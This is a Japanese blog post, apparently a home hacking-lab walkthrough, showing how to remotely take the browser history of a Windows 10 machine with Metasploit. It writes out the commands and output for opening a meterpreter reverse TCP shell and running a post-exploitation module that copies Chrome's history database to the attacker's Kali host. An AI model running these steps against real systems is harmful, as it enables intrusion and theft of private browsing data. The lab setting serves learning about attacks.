Windows 10 を遠隔操作しブラウザ履歴を取得する方法

Windows 10

今回は、ターゲット端末である Windows 10 のブラウザ履歴を取得します。

windows/gather/forensics/browser_history

ブラウザ履歴取得モジュールの「windows/gather/forensics/browser_history」を使用します。

このモジュールの実行は、既に確立されているセッションを利用します。そのため、先に meterpreter でセッションを確立します。

msf5 post(windows/gather/forensics/browser_history) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.0.0.2
lhost => 10.0.0.2
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] Sending stage (206403 bytes) to 10.0.0.103
[*] Meterpreter session 4 opened (10.0.0.2:4444 -> 10.0.0.103:50269) at 2020-03-14 21:34:12 -0400

meterpreter >

セッションを確立した状態で、一旦 meterpreter プロンプトを抜けます。

meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) >

その後「windows/gather/forensics/browser_history」を用いて、meterpreter で接続しているターゲットのブラウザ履歴を取得します。

msf5 exploit(multi/handler) > use windows/gather/forensics/browser_history
msf5 post(windows/gather/forensics/browser_history) > set session 3
session => 3
msf5 post(windows/gather/forensics/browser_history) > run

[*] Gathering user profiles
[*] Checking for Chrome History artifacts...
[-] Chrome History directory not found for kdryo
[*] Checking for Chrome Archived History artifacts...
[-] Chrome Archived History directory not found for kdryo
[*] Checking for Skype artifacts...
[-] Skype directory not found for kdryo
[*] Checking for Firefox artifacts...
[-] Firefox directory not found for kdryo
[*] Post module execution completed

メッセージを見る限り Chrome、Firefox、Skype の履歴を取得しているようですが、どれも使用したことがないため履歴を取得できませんでした。
そのため、Windows 10 で Chrome を使用し履歴を残します。

もう一度ブラウザ履歴の取得を行います。

msf5 post(windows/gather/forensics/browser_history) > run

[*] Gathering user profiles
[*] Checking for Chrome History artifacts...
[+] Chrome History directory found kdryo
[*] Downloading C:\Users\kdryo\AppData\Local\Google\Chrome\User Data\Default\History
[+] Chrome History artifact file saved to /root/.msf4/local/kdryo_ChromeHistory_Default_History.
[*] Checking for Chrome Archived History artifacts...
[+] Chrome Archived History directory found kdryo
[*] Checking for Skype artifacts...
[-] Skype directory not found for kdryo
[*] Checking for Firefox artifacts...
[-] Firefox directory not found for kdryo
[*] Post module execution completed

すると、「/root/.msf4/local/kdryo_ChromeHistory_Default_History.」として履歴が保存されました。
ファイルの中身を見てみますが、SQLite データベースのため内容を確認できませんでした。

root@kali:~/Downloads/Windows# file /root/.msf4/local/kdryo_ChromeHistory_Default_History.
/root/.msf4/local/kdryo_ChromeHistory_Default_History.: SQLite 3.x database, last written using SQLite version 3030001
root@kali:~/Downloads/Windows#

そのため Kali にデフォルトでインストールされている「SQLite database browser」で中身を確認します。
検索キーワード等の情報を確認できました。

このようにターゲット端末のブラウザ履歴を窃取することができました。

今回は以上です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました